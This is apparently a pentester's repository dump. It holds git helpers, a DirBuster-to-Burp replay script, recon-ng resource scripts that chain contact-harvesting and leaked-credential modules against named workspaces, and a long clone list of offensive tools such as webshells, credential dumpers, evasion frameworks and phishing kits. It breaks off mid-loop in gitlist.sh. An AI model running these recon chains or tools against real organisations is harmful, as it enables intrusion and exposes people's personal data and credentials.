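├── README.md
├── ctfme
├── dirbuster2burp.sh
├── gen-recon-rc
    ├── .DS_Store
    ├── .rc
    ├── modules.txt
    ├── recon-rc-gen.sh
    ├── run-discovery-modules.rc
    └── run-recon-modules.rc
├── gitlist.sh
├── gitme
├── gitupdate.sh
├── gitupdate2.sh
├── jk-fierce.tar
├── jk-fierce
    ├── hosts.txt
    └── subdomains2.txt
├── jknmap
├── macosxhack.sh
├── powershell.sh
├── replace-openjdk-with-oraclejdk.txt
├── snmp-all-community.txt
├── start-listener.py
├── svn.sh
├── wgetlist.sh
├── wp5.sh
└── xssf.sh

/README.md:
--------------------------------------------------------------------------------
1 | These files are lists of my favorite git projects.
2 | gitlist.sh is a bash script that pulls all the projects.
3 | wgetlist.sh does the same for the few that arent on github
4 | svn.sh see above
5 | powershell.sh pulls just the powershell stuff into /var/wwww
6 | 
--------------------------------------------------------------------------------
/ctfme:
--------------------------------------------------------------------------------
#!/bin/bash
# ctfme - stage, commit and push the contents of ./ctf to origin/master.

# Stop if ./ctf is missing; otherwise the git commands below would run
# against whatever repository the caller is currently standing in.
cd ctf || exit 1

# "--" keeps a file name that begins with '-' from being parsed as an option.
# NOTE(review): this stages every non-dot entry without review; check
# `git status` first so notes, captures or keys are not pushed to the remote.
git add -A -- *
git commit -m "adding a few tools"
git push -u origin master

--------------------------------------------------------------------------------
/dirbuster2burp.sh:
--------------------------------------------------------------------------------
# dirbuster2burp.sh - request every path listed in a DirBuster report ($1)
# through the local proxy at 127.0.0.1:8080, discarding the response bodies.
# Usage: dirbuster2burp.sh dirbuster-report

# Placeholder carried over from the original one-liner; set it to the host
# name before running.
target='[target of scan]'

if [ "$#" -ne 1 ] || [ ! -r "$1" ]; then
  echo "usage: dirbuster2burp.sh dirbuster-report" >&2
  exit 2
fi

# Unquoted, the placeholder used to split into three words and curl was
# handed three broken URLs; refuse to run until it has been replaced.
if [ "$target" = '[target of scan]' ]; then
  echo "dirbuster2burp.sh: set 'target' at the top of the script first" >&2
  exit 2
fi

# Keep only lines that start with '/' and contain no ':'.
# read -r keeps backslashes literal; quoting the URL stops the shell from
# word-splitting or globbing a path taken from the report file.
grep '^/' -- "$1" | grep -v ':' | while read -r path; do
  curl -s --proxy 127.0.0.1:8080 -o /dev/null "http://${target}${path}"
done

--------------------------------------------------------------------------------
/gen-recon-rc/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/macubergeek/gitlist/707223c7b04501dba69a4a05217e50b4e8017585/gen-recon-rc/.DS_Store
--------------------------------------------------------------------------------
/gen-recon-rc/.rc:
--------------------------------------------------------------------------------
1 | “./recon-ng -w
2 | “What is name of company?”
3 | 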
“add companies” 4 | “” 5 | “What is name of domain?” 6 | add domains 7 | 8 | “./recon-ng -w 9 | “What is name of company?” 10 | “add companies” 11 | 12 | “” 13 | “What is name of domain?” 14 | add domains 15 | 16 | ./recon-ng -w 17 | “What is name of company?” 18 | “add companies” 19 | 20 | “” 21 | “What is name of domain?” 22 | add domains 23 | 24 | ./recon-ng -w 25 | “What is name of company?” 26 | “add companies” 27 | 28 | “” 29 | “What is name of domain?” 30 | ./recon-ng -w 31 | “What is name of company?” 32 | “add companies” 33 | 34 | “” 35 | “What is name of domain?” 36 | -------------------------------------------------------------------------------- /gen-recon-rc/modules.txt: -------------------------------------------------------------------------------- 1 | recon/companies-contacts/jigsaw/point_usage 2 | recon/companies-contacts/jigsaw/purchase_contact 3 | recon/companies-contacts/jigsaw/search_contacts 4 | recon/companies-contacts/jigsaw_auth 5 | recon/companies-contacts/linkedin_auth 6 | recon/companies-multi/github_miner 7 | recon/companies-multi/whois_miner 8 | recon/companies-profiles/bing_linkedin 9 | recon/contacts-contacts/mailtester 10 | recon/contacts-contacts/mangle 11 | recon/contacts-contacts/unmangle 12 | recon/contacts-credentials/hibp_breach 13 | recon/contacts-credentials/hibp_paste 14 | recon/contacts-credentials/pwnedlist 15 | recon/contacts-domains/migrate_contacts 16 | recon/contacts-profiles/fullcontact 17 | recon/credentials-credentials/adobe 18 | recon/credentials-credentials/bozocrack 19 | recon/credentials-credentials/hashes_org 20 | recon/credentials-credentials/leakdb 21 | recon/domains-contacts/metacrawler 22 | recon/domains-contacts/pgp_search 23 | recon/domains-contacts/salesmaple 24 | recon/domains-contacts/whois_pocs 25 | recon/domains-credentials/pwnedlist/account_creds 26 | recon/domains-credentials/pwnedlist/api_usage 27 | recon/domains-credentials/pwnedlist/domain_creds 28 | 
recon/domains-credentials/pwnedlist/domain_ispwned 29 | recon/domains-credentials/pwnedlist/leak_lookup 30 | recon/domains-credentials/pwnedlist/leaks_dump 31 | recon/domains-hosts/baidu_site 32 | recon/domains-hosts/bing_domain_api 33 | recon/domains-hosts/bing_domain_web 34 | recon/domains-hosts/builtwith 35 | recon/domains-hosts/google_site_api 36 | recon/domains-hosts/google_site_web 37 | recon/domains-hosts/netcraft 38 | recon/domains-hosts/shodan_hostname 39 | recon/domains-hosts/ssl_san 40 | recon/domains-hosts/vpnhunter 41 | recon/domains-hosts/yahoo_domain 42 | recon/domains-vulnerabilities/ghdb 43 | recon/domains-vulnerabilities/punkspider 44 | recon/domains-vulnerabilities/xssed 45 | recon/domains-vulnerabilities/xssposed 46 | recon/hosts-domains/migrate_hosts 47 | recon/hosts-hosts/bing_ip 48 | recon/hosts-hosts/freegeoip 49 | recon/hosts-hosts/ip_neighbor 50 | recon/hosts-hosts/ipinfodb 51 | recon/hosts-hosts/resolve 52 | recon/hosts-hosts/reverse_resolve 53 | recon/locations-locations/geocode 54 | recon/locations-locations/reverse_geocode 55 | recon/locations-pushpins/flickr 56 | recon/locations-pushpins/instagram 57 | recon/locations-pushpins/picasa 58 | recon/locations-pushpins/shodan 59 | recon/locations-pushpins/twitter 60 | recon/netblocks-companies/whois_orgs 61 | recon/netblocks-hosts/reverse_resolve 62 | recon/netblocks-hosts/shodan_net 63 | recon/netblocks-ports/census_2012 64 | recon/ports-hosts/migrate_ports 65 | recon/profiles-contacts/dev_diver 66 | recon/profiles-contacts/linkedin 67 | recon/profiles-profiles/linkedin_crawl 68 | recon/profiles-profiles/namechk 69 | recon/profiles-profiles/profiler 70 | recon/profiles-profiles/twitter 71 | recon/profiles-repositories/github_repos 72 | recon/repositories-vulnerabilities/gists_search 73 | recon/repositories-vulnerabilities/github_dorks 74 | -------------------------------------------------------------------------------- /gen-recon-rc/recon-rc-gen.sh: 
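--------------------------------------------------------------------------------
#!/bin/bash
# recon-rc-gen.sh - append a recon-ng resource script to ../<workspace>.rc:
# one "workspaces select" line, then "use <module>" / "run" for every entry
# in modules.txt (read from the current directory).
set -u

echo "Set up workspace, domain, locations, hosts, subnets."
echo "What is name of workspace?"
# -r keeps backslashes literal; the answer becomes part of a file path below.
IFS= read -r ws

# The workspace name is typed by the operator and is used both in the output
# path and in the generated command line, so accept a plain token only:
# no '/', no whitespace, no leading '-'.
case "$ws" in
  '' | -* | *[!A-Za-z0-9._-]*)
    echo "invalid workspace name: use letters, digits, '.', '_' or '-'" >&2
    exit 1
    ;;
esac

rc_file="../${ws}.rc"

if [ ! -r modules.txt ]; then
  echo "modules.txt not found in $(pwd)" >&2
  exit 1
fi

{
  printf 'workspaces select %s\n' "$ws"
  # Prefix each module path with "use " directly. The earlier
  # sed 's/recon/use recon/g' rewrote every occurrence of "recon" on a line
  # and left lines without "recon" with no "use" at all.
  while IFS= read -r module || [ -n "$module" ]; do
    [ -n "$module" ] || continue
    printf 'use %s\nrun\n' "$module"
  done < modules.txt
} >> "$rc_file"

--------------------------------------------------------------------------------
/gen-recon-rc/run-discovery-modules.rc:
--------------------------------------------------------------------------------
1 | workspaces select BCBS
2 | use discovery/info_disclosure/cache_snoop
3 | run
4 | use discovery/info_disclosure/interesting_files
5 | run
6 | 
--------------------------------------------------------------------------------
/gen-recon-rc/run-recon-modules.rc:
--------------------------------------------------------------------------------
1 | workspaces select FRTIB2
2 | use recon/companies-contacts/linkedin_auth
3 | run
4 | use recon/companies-multi/whois_miner
5 | run
6 | use recon/companies-profiles/bing_linkedin
7 | run
8 | use recon/contacts-contacts/mailtester
9 | run
10 | use recon/contacts-contacts/mangle
11 | run
12 | use recon/contacts-contacts/unmangle
13 | run
14 | use recon/contacts-credentials/hibp_breach
15 | run
16 | use recon/contacts-credentials/hibp_paste
17 | run
18 | use recon/contacts-credentials/pwnedlist
19 | run
20 | use recon/contacts-domains/migrate_contacts
21 | run
22 | use recon/contacts-profiles/fullcontact
23 | run
24 | use recon/credentials-credentials/adobe
25 | run
26 | use recon/credentials-credentials/bozocrack
27 | run
28 | use recon/credentials-credentials/hashes_org
29 | run
30 | use recon/credentials-credentials/leakdb
31 | run
32 | use recon/domains-contacts/pgp_search
33 | run
34 | use recon/domains-contacts/salesmaple
35 | run
36 | use recon/domains-contacts/whois_pocs
37 | run
38 | use recon/domains-hosts/baidu_site
39 | run
40 | use recon/domains-hosts/bing_domain_api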
41 | run 42 | use recon/domains-hosts/bing_domain_web 43 | run 44 | use recon/domains-hosts/brute_hosts 45 | run 46 | use recon/domains-hosts/builtwith 47 | run 48 | use recon/domains-hosts/google_site_api 49 | run 50 | use recon/domains-hosts/google_site_web 51 | run 52 | use recon/domains-hosts/netcraft 53 | run 54 | use recon/domains-hosts/shodan_hostname 55 | run 56 | use recon/domains-hosts/ssl_san 57 | run 58 | use recon/domains-hosts/vpnhunter 59 | run 60 | use recon/domains-hosts/yahoo_domain 61 | run 62 | use recon/domains-vulnerabilities/punkspider 63 | run 64 | use recon/domains-vulnerabilities/xssed 65 | run 66 | use recon/domains-vulnerabilities/xssposed 67 | run 68 | use recon/hosts-domains/migrate_hosts 69 | run 70 | use recon/hosts-hosts/bing_ip 71 | run 72 | use recon/hosts-hosts/freegeoip 73 | run 74 | use recon/hosts-hosts/ip_neighbor 75 | run 76 | use recon/hosts-hosts/ipinfodb 77 | run 78 | use recon/hosts-hosts/resolve 79 | run 80 | use recon/hosts-hosts/reverse_resolve 81 | run 82 | use recon/locations-locations/geocode 83 | run 84 | use recon/locations-locations/reverse_geocode 85 | run 86 | use recon/locations-pushpins/flickr 87 | run 88 | use recon/locations-pushpins/instagram 89 | run 90 | use recon/locations-pushpins/picasa 91 | run 92 | use recon/locations-pushpins/shodan 93 | run 94 | use recon/locations-pushpins/twitter 95 | run 96 | use recon/locations-pushpins/youtube 97 | run 98 | use recon/netblocks-companies/whois_orgs 99 | run 100 | use recon/netblocks-hosts/reverse_resolve 101 | run 102 | use recon/netblocks-hosts/shodan_net 103 | run 104 | use recon/netblocks-ports/census_2012 105 | run 106 | use recon/ports-hosts/migrate_ports 107 | run 108 | use recon/profiles-contacts/dev_diver 109 | run 110 | use recon/profiles-contacts/linkedin 111 | run 112 | use recon/profiles-profiles/linkedin_crawl 113 | run 114 | use recon/profiles-profiles/namechk 115 | run 116 | use recon/profiles-profiles/profiler 117 | run 118 | use 
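recon/profiles-profiles/twitter
119 | run
120 | 
--------------------------------------------------------------------------------
/gitlist.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# gitlist.sh - run "git clone" for every entry in the list below, into the
# parent directory of the current working directory.
#
# Review notes:
#  * Every entry is cloned at whatever the remote's default branch holds at
#    that moment; nothing is pinned to a commit or tag. Treat the result as
#    unreviewed third-party code.
#  * Entries using git:// or http:// are fetched with no transport
#    authentication or encryption, so content can be altered in transit.
#    Prefer an https:// URL for those where the project offers one.
#  * A few entries are not git repositories (a .vbs file, a .tar.bz2 with a
#    trailing ':', a .zip, a raw .py). git clone fails on them and the loop
#    moves on.
#  * The list is split on whitespace, as before, so the second word on the
#    "goodfet goodfet" line is attempted as a clone of its own.

# Quoted delimiter: the list is data and must not undergo $ or backtick
# expansion while it is read.
repos=$(cat <<'EOF'
https://github.com/urbanesec/ZackAttack.git
https://github.com/rogueclown/recon-scripts.git
https://bitbucket.org/LaNMaSteR53/recon-ng.git
https://bitbucket.org/LaNMaSteR53/honeybadger.git
https://bitbucket.org/LaNMaSteR53/peepingtom.git
http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
https://github.com/toolswatch/DPE.git
https://github.com/mubix/post-exploitation.git
https://github.com/1aN0rmus/TekDefense-Automater.git
https://github.com/ornicar/backdoor.git
https://github.com/SpiderLabs/BurpNotesExtension.git
https://github.com/SmeegeSec/WSDLWizard.git
https://github.com/Meatballs1/burp-extensions.git
https://github.com/abhijitsverma/burp_extension_MultiScanner.git
https://github.com/SpiderLabs/UPnP-request-generator.git
https://github.com/moxie0/sslstrip.git
https://github.com/moxie0/sslsniff.git
https://github.com/GDSSecurity/PadBuster.git
https://github.com/nealharris/BREACH.git
https://github.com/sqlmapproject/sqlmap.git
https://github.com/Neohapsis/bbqsql.git
https://github.com/GDSSecurity/SQLBrute.git
https://github.com/7a/owtf.git
https://github.com/beefproject/beef.git
https://github.com/ianic/mssql.git
https://github.com/milo2012/osintstalker.git
https://github.com/mossmann/hackrf.git
https://github.com/rsmudge/cortana-scripts.git
https://github.com/mubix/vt-notify.git
https://github.com/wick2o/gitDigger.git
https://github.com/Hood3dRob1n/ShodanAPI.git
https://github.com/jvehent/cipherscan.git
https://github.com/gps-sdr/gps-sdr.git
https://github.com/azet/Software-Defined-Radio.git
https://github.com/kpreid/shinysdr.git
https://github.com/csete/gqrx.git
https://github.com/texane/nrf.git
https://github.com/EliasOenal/multimon-ng.git
https://github.com/b00stfr3ak/misc.git
https://github.com/brav0hax/smbexec.git
https://github.com/b00stfr3ak/fast_meterpreter.git
https://code.google.com/p/lazykali/
git://git.gnumonks.org/airprobe.git
git://git.srlabs.de/kraken.git
https://github.com/fgont/ipv6toolkit.git
https://github.com/mattifestation/PowerSploit.git
https://github.com/urbanadventurer/WhatWeb.git
https://github.com/mhendrickx/Lilith.git
https://github.com/cr0hn/golismero.git
https://github.com/mandatoryprogrammer/xssless.git
https://github.com/zmap/zmap.git
https://github.com/robertdavidgraham/masscan.git
https://github.com/tiwaryshailesh/Masscan-For-Metasploit.git
https://github.com/macubergeek/gitlist.git
https://github.com/opinkerfi/winexe.git
https://github.com/kanzure/python-wmi-client-wrapper.git
https://gist.github.com/9107276.git
https://github.com/PenturaLabs/Linux_Exploit_Suggester.git
https://github.com/mmoya/pkg-thc-ipv6.git
https://github.com/bastibl/gr-rds.git
https://github.com/Hood3dRob1n/creep3r.git
https://github.com/fgont/ipv6toolkit.git
https://github.com/mmoya/pkg-thc-ipv6.git
https://github.com/leebaird/discover.git
https://github.com/lightos/Panoptic.git
https://github.com/QBurst/PenQ.git
https://github.com/MooseDojo/Serpico.git
https://github.com/SpiderLabs/Responder.git
https://github.com/mattifestation/PowerSploit.git
https://github.com/TigerSecurity/gerix-wifi-cracker.git
http://www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2:
https://github.com/wpscanteam/wpscan.git
https://github.com/mubix/WhiteChapel.git
https://gist.github.com/10107280.git
https://gist.github.com/9107284.git
https://gist.github.com/9107276.git
https://github.com/mmessano/PowerShell.git
https://github.com/brav0hax/easy-creds.git
https://github.com/felmoltor/DNSSnoopDogg.git
https://github.com/robertdavidgraham/heartleech.git
git://git.openssl.org/openssl.git
https://github.com/mubix/netview.git
https://github.com/mubix/WhiteChapel.git
git://github.com/anestisb/WeBaCoo.git
https://gist.github.com/5371322.git
https://github.com/slattman/php-reverse-shell.git
git://github.com/zacinaction/kicksat.wiki.git
https://github.com/inquisb/keimpx.git
https://github.com/TheRook/subbrute.git
https://gist.github.com/10171593.git
https://github.com/rsmudge/metasploit-loader.git
https://gist.github.com/b54e50a3dddfb3fadd0a.git
https://github.com/jekyc/wig.git
https://github.com/bastibl/gr-ieee802-11.git
https://github.com/dcramer/chardet.git
https://github.com/client9/sslassert.git
https://github.com/toddsiegel/spscan.git
https://github.com/EarToEarOak/RTLSDR-Scanner.git
https://github.com/kevinmehall/rtlsdr-433m-sensor.git
https://github.com/bemasher/rtlamr.git
https://github.com/nickodell/morse-code.git
https://github.com/merbanan/rtl_433.git
https://github.com/sensepost/mana.git
https://github.com/ksnieck/airprobe.git
https://github.com/rasta-mouse/Mjolnir.git
https://github.com/Netflix/Scumblr.git
https://github.com/Netflix/Workflowable.git
https://github.com/Netflix/sketchy.git
https://github.com/mutability/rtl-sdr.git
https://github.com/csete/gnuradio-grc-examples.git
http://git.gnuradio.org/git/gnuradio.git
https://github.com/omriiluz/NRF24-BTLE-Decoder.git
https://github.com/bemasher/rtlamr.git
https://github.com/eT0M/rtl_sdr_FS20_decoder.git
https://github.com/jacobzelek/rtl_sdr_kit.git
https://github.com/yuvadm/gascop.git
https://github.com/antirez/dump1090.git
https://github.com/skaringa/weather-sdr-decode.git
https://github.com/Nuand/bladeRF.git
https://github.com/allfro/sploitego.git
https://github.com/balle/bluediving.git
https://github.com/tkuester/gr-psk31.git
https://github.com/bgamari/gnuradio-multimode.git
https://github.com/secretsquirrel/the-backdoor-factory.git
https://github.com/secretsquirrel/BDFProxy
git://git.osmocom.org/sdrangelove.git
https://github.com/OWASP/O-Saft.git
https://github.com/rockymeza/wifi.git
https://github.com/clockfort/wifi-locator.git
https://github.com/OpenSecurityResearch/hostapd-wpe.git
https://github.com/windytan/slowrx.git
https://github.com/offensive-security/kali-sly-pi.git
https://github.com/AdamLaurie/RFIDIOt.git
https://github.com/Proxmark/proxmark3.git
https://github.com/rezeusor/killerbee.git
https://github.com/CoreSecurity/impacket.git
https://github.com/Miserlou/Hash-Identifier.git
https://github.com/freaklabs/chibiArduino.git
https://bitbucket.org/skew/gyuto.git
https://github.com/fishnetsecurity/Lair.git
https://github.com/ctfs/write-ups.git
https://github.com/trustedsec/unicorn.git
https://github.com/poweradminllc/PAExec.git
https://github.com/HarmJ0y/PowerUp.git
https://github.com/zeknox/scripts.git
https://github.com/darkoperator/Posh-SecMod.git
https://github.com/besimorhino/powercat.git
https://github.com/vacmf/powershell-scripts.git
https://github.com/silentbreaksec/Throwback.git
https://github.com/TweekFawkes/White_Lightning.git
https://github.com/kirill85/BlackSquirrel.git
git://w1.fi/hostap.git
https://github.com/SilverFoxx/PwnSTAR.git
https://github.com/nidem/kerberoast.git
https://github.com/silentbreaksec/ThrowbackLP.git
https://github.com/roeyk/nessus-report.git
https://github.com/travisgoodspeed/goodfet goodfet
https://github.com/robotastic/smartnet-scanner.git
https://github.com/pinkavaj/gr-scan.git
https://github.com/jboone/tpms.git
https://github.com/sitsec/bruteforce-crc.git
https://github.com/nccgroup/metasploitavevasion.git
https://github.com/pentestgeek/phishing-frenzy.git
https://github.com/pentestgeek/phishing-frenzy-templates.git
https://github.com/AdamLaurie/RFIDIOt.git
https://github.com/rainkid/httrack.git
https://github.com/junks/linkedInScraper.git
https://bitbucket.org/al14s/rawr.git
https://github.com/rebootuser/LinEnum.git
https://github.com/bidord/pykek.git
https://github.com/moxie0/chapcrack.git
https://github.com/0xsauby/yasuo.git
https://bitbucket.org/R4v3N/wp-plug.git
https://github.com/leechristensen/UnmanagedPowerShell.git
https://github.com/trustedsec/hash_parser.git
https://github.com/smunaut/osmo-pocsag.git
https://github.com/bafe/gr-pocsag.git
git://git.osmocom.org/gr-osmosdr
https://github.com/mitmproxy/mitmproxy.git
https://github.com/vk496/linset.git
https://github.com/galkan/crowbar
https://github.com/covertcodes/freqwatch.git
https://github.com/sixdub/Minions.git
git://github.com/kennethreitz/requests.git
https://github.com/wireghoul/dotdotpwn.git
https://github.com/superkojiman/dirtshell.git
https://github.com/superkojiman/rfishell.git
https://github.com/ikkisoft/bradamsa.git
https://github.com/smicallef/spiderfoot.git
https://github.com/invisiblethreat/peeper.git
https://github.com/devttys0/binwalk.git
https://github.com/devttys0/binwalk.wiki.git
https://github.com/TweekFawkes/White_Lightning.git
https://github.com/danielmiessler/SecLists.git
https://code.google.com/p/patator/
https://github.com/argilo/sdr-examples.git
https://github.com/milo2012/metasploitHelper.git
https://github.com/Veil-Framework/Veil-Evasion.git
https://github.com/Veil-Framework/PowerTools.git
https://github.com/Veil-Framework/Veil.git
https://github.com/Veil-Framework/Veil-Pillage.git
https://github.com/Veil-Framework/Veil-Catapult.git
https://github.com/SmeegeSec/HashTag.git
https://github.com/gentilkiwi/mimikatz.git
https://github.com/malerisch/burp-csj.git
https://github.com/ShawnDEvans/smbmap.git
https://github.com/stephenfewer/ReflectiveDLLInjection.git
https://github.com/SecureNetworkManagement/shellshockUAscanner.git
https://github.com/glentregoning/mitmtest.git
https://github.com/rebootuser/LinEnum.git
https://github.com/sethsec/crossdomain-exploitation-framework.git
https://github.com/gursev/flash-xdomain-xploit.git
https://github.com/NetSPI/Wsdler/archive/master.zip
https://github.com/rustyrobot/fuzzdb.git
https://github.com/iagox86/dnscat2.git
https://github.com/sixdub/DomainTrustExplorer.git
https://github.com/docker/docker.git
https://github.com/stasinopoulos/commix.git
https://github.com/hatRiot/zarp.git
https://github.com/infobyte/faraday.git
https://github.com/Hood3dRob1n/addicted2hash.git
https://github.com/byt3bl33d3r/gcat.git
https://github.com/enigma0x3/Generate-Macro.git
https://github.com/tcstool/NoSQLMap.git
https://github.com/cheetz/pi_phone_home.git
https://github.com/cheetz/spearphishing.git
https://github.com/cheetz/adobe_password_checker.git
https://github.com/cheetz/Web_Password_Gen.git
https://github.com/cheetz/brutescrape.git
https://github.com/MaYaSeVeN/Wmap.git
https://github.com/sophron/wifiphisher.git
https://github.com/cheetz/Easy-P.git
https://github.com/michenriksen/gitrob.git
https://github.com/secforce/sparta.git
https://github.com/breenmachine/httpscreenshot.git
https://github.com/ChrisTruncer/EyeWitness.git
https://github.com/HackerFantastic/Public.git
https://github.com/cheetz/icmpshock.git
https://github.com/rapid7/ssh-badkeys.git
https://github.com/sbehrens/sleepy-puppy.git
https://github.com/trustedsec/social-engineer-toolkit.git
https://github.com/tatanus/SPF.git
https://github.com/obscuresec/random.git
https://github.com/jkakavas/creepy.git
https://github.com/evilsocket/bettercap.git
https://github.com/EiNSTeiN-/poodle.git
https://github.com/mpgn/poodle-exploit.git
https://github.com/JayBeale/middler.git
https://github.com/felmoltor/DNSSnoopDogg.git
https://github.com/z0mbiehunt3r/dns-snoopy.git
https://github.com/GDSSecurity/SSH-Weak-DH.git
https://github.com/trustedsec/ptf
https://github.com/trustedsec/meterssh.git
https://github.com/PowerShellEmpire/Empire.git
https://github.com/spinkham/skipfish.git
https://github.com/RetireJS/retire.js.git
https://github.com/jhaddix/domain.git
https://github.com/Dionach/CMSmap.git
https://github.com/intrigueio/intrigue-core.git
https://github.com/debasishm89/burpy.git
https://github.com/arvinddoraiswamy/mywebappscripts.git
https://github.com/jhaddix/domain.git
https://github.com/jhaddix/tbhm.git
https://github.com/NytroRST/NetRipper.git
https://github.com/Ali-Razmjoo/OWASP-ZSC.git
https://github.com/Smaash/snitch.git
https://github.com/google/binnavi.git
https://github.com/dagorim/api_wordlist.git
https://github.com/enjoiz/XXEinjector.git
https://github.com/yorickdewid/Wordgen.git
https://github.com/gojhonny/CredCrack.git
https://github.com/AbhishekGhosh/FREAK-Attack-CVE-2015-0204-Testing-Script.git
https://github.com/IFGHou/Grendel-Scan.git
https://github.com/aircrack-ng/aircrack-ng.git
https://github.com/twilsonb/jbrofuzz.git
https://github.com/pentestmonkey/unix-privesc-check.git
https://github.com/ajinabraham/YSO-Mobile-Security-Framework.git
https://github.com/linux-can/can-utils.git
https://github.com/RUB-NDS/WS-Attacker.git
https://github.com/vetsin/SamlSnort.git
https://github.com/mandatoryprogrammer/sonar.git
https://github.com/milo2012/osintstalker.git
https://github.com/exitnode/nmap-sqlite-output.git
https://github.com/nmap/nmap.git
https://github.com/LionSec/wifresti.git
https://github.com/dloss/python-pentest-tools.git
https://github.com/tiwaryshailesh/MetasploitOnSteroids.git
https://github.com/mattifestation/WMI_Backdoor.git
https://github.com/NetSPI/cmdsql.git
https://github.com/brad-anton/freeradius-wpe.git
https://github.com/b00stfr3ak/fast_meterpreter.git
https://github.com/tennc/webshell.git
https://raw.githubusercontent.com/musalbas/heartbleed-masstest/master/ssltest.py
https://gist.github.com/10100394.git
https://gist.github.com/10174134.git
https://github.com/decal/ssltest-stls.git
https://github.com/ajinabraham/Static-DOM-XSS-Scanner.git
https://github.com/gbrindisi/xsssniper.git
https://github.com/portcullislabs/xssshell-xsstunnell.git
https://github.com/portcullislabs/rdp-sec-check.git
https://github.com/averagesecurityguy/scripts.git
https://github.com/MooseDojo/praedasploit.git
https://github.com/byt3bl33d3r/CrackMapExec.git
https://bitbucket.org/mattinfosec/wordhound.git
https://github.com/cheetz/reddit_xss.git
https://github.com/epinna/weevely3.git
https://github.com/fireeye/synfulknock.git
https://gist.github.com/4461a4853ba0741b2a29.git
https://gist.github.com/1c4e34af21acb679641a.git
https://github.com/evilpacket/DVCS-Pillage.git
https://github.com/SYWorks/wifi-harvester.git
https://github.com/drwetter/testssl.sh.git
https://github.com/kussic/arlandria.git
https://github.com/SYWorks/network_harvester.git
https://github.com/SYWorks/wpa-bruteforcer.git
https://github.com/AnimeshShaw/Hash-Algorithm-Identifier.git
https://github.com/hybridus/heartbleedscanner.git
https://github.com/hybridus/heartbleedscanner.git
https://github.com/ChrisTruncer/Just-Metadata.git
https://bitbucket.org/clr2of8/autoscanwithburp.git
https://github.com/Shellntel/scripts.git
https://github.com/cornerpirate/ReportCompiler.git
https://github.com/funoverip/epowner.git
https://github.com/foreni-packages/cisco-global-exploiter.git
https://github.com/sandrogauci/tftptheft.git
https://github.com/1N3/Findsploit.git
https://github.com/CoderPirata/XPL-SEARCH.git
https://github.com/xdistro/ShellShock.git
https://github.com/jumanjihouse/docker-ssllabs-scan.git
https://github.com/ChrisTruncer/Just-Metadata.git
https://github.com/Hypsurus/weeman.git
https://github.com/SSTCYR/nipper-ng.git
https://github.com/droe/sslsplit
https://github.com/Kevin-Robertson/Inveigh.git
https://github.com/NullArray/PyCat.git
https://github.com/strictlymike/tools.git
https://github.com/sullo/nikto.git
https://github.com/ZilentJack/Get-ADHashDump.git
https://github.com/dolevf/tracetester.git
https://github.com/CoderPirata/XPL-SEARCH.git
https://github.com/offwidth/http-tunnel-aes.git
https://github.com/denandz/KeeFarce.git
https://github.com/maurosoria/dirs3arch.git
https://github.com/techgaun/github-dorks.git
https://github.com/jgor/dork-cli.git
https://github.com/quackware/dorky.git
https://gist.github.com/5950305.git
https://github.com/fuzzdb-project/fuzzdb.git
https://github.com/kahunalu/pwnbin.git
https://github.com/secabstraction/PowerCat.git
https://github.com/samratashok/nishang.git
https://github.com/ChrisTruncer/Egress-Assess.git
https://github.com/nccgroup/chuckle.git
https://github.com/ChrisTruncer/WMIOps.git
https://github.com/psypanda/hashID.git
https://github.com/n1nj4sec/pupy.git
https://github.com/silentbreaksec/UnmanagedPowerShell.git
https://github.com/silentbreaksec/Throwback.git
https://github.com/silentbreaksec/ThrowbackLP.git
https://github.com/silentbreaksec/Trebuchet.git
https://github.com/hfiref0x/UACME.git
https://github.com/0xd4d/dnSpy.git
https://github.com/1N3/Sn1per.git
https://github.com/pentestmonkey/windows-privesc-check.git
https://github.com/samratashok/Kautilya.git
https://github.com/danielmiessler/RobotsDisallowed.git
https://github.com/HarmJ0y/CheatSheets.git
https://github.com/ParrotSec/alternate-install.git
https://github.com/securitytube/wifiscanvisualizer.git
https://github.com/commonexploits/livehosts.git
https://github.com/commonexploits/dtpscan.git
https://github.com/commonexploits/weape.git
https://github.com/commonexploits/weape.git
https://github.com/commonexploits/port-scan-automation.git
https://github.com/commonexploits/winocphc.git
https://github.com/commonexploits/vlan-hopping.git
https://github.com/nccgroup/easyda.git
https://github.com/nccgroup/cisco-SNMP-enumeration.git
https://github.com/juliocesarfort/netscreen-shodan-scanner.git
https://github.com/herrbischoff/awesome-osx-command-line.git
https://github.com/vanhauser-thc/thc-hydra.git
https://github.com/jkbrzt/httpie.git
https://github.com/mandatoryprogrammer/FlashHTTPRequest.git
https://github.com/hatRiot/clusterd.git
https://github.com/nvbn/everpad.git
https://github.com/paramiko/paramiko.git
https://github.com/scadastrangelove/SCADAPASS.git
https://github.com/leonteale/pentestpackage.git
https://github.com/commonexploits/whatsfree.git
https://github.com/commonexploits/dtpscan.git
https://github.com/commonexploits/weape.git
https://github.com/commonexploits/vlan-hopping.git
https://github.com/nccgroup/cisco-SNMP-enumeration.git
https://github.com/Warpnet/scantool.git
https://github.com/Gallopsled/pwntools.git
https://github.com/allfro/BurpKit.git
https://github.com/allfro/pymiproxy.git
https://github.com/darkoperator/dnsrecon.git
https://github.com/elceef/dnstwist.git
https://github.com/foxglovesec/Potato.git
https://github.com/packetfocus/Recon.git
https://github.com/iamchippa/dumpmon-scraper.git
https://github.com/Gradberry/Email-Permutator.git
https://github.com/aboul3la/Sublist3r.git
https://github.com/Kevin-Robertson/Tater
https://github.com/rsmudge/Malleable-C2-Profiles.git
https://github.com/leonteale/pentestpackage.git
https://github.com/JohnTroony/php-webshells.git
https://github.com/hardwaterhacker/URLCrazy.git
https://github.com/jaredhaight/PSAttack.git
https://github.com/mubix/post-exploitation.git
https://github.com/milo2012/pentest_scripts.git
https://github.com/sensepost/BiLE-suite.git
https://github.com/Raikia/SMBCrunch.git
https://github.com/Raikia/CredSwissArmy.git
https://github.com/ericevenchick/CANard.git
https://github.com/danielmiessler/ATM
https://github.com/linuz/Email-Verifier.git
https://github.com/khr0x40sh/MacroShop.git
https://github.com/thezawad/rev-door.git
https://github.com/Charliedean/psexecspray.git
https://github.com/Hypsurus/weeman.git
https://github.com/eklitzke/c.sh.git
https://github.com/PowerShell/PowerShell.git
https://github.com/USArmyResearchLab/Dshell.git
https://github.com/znb/Scripts.git
EOF
)

# Stop if the parent directory is unreachable, so the clones do not land in
# an unexpected place.
cd ../ || exit 1

# The list is split on whitespace on purpose; turn globbing off so no entry
# can expand against files in the target directory.
set -f
for repo in $repos; do
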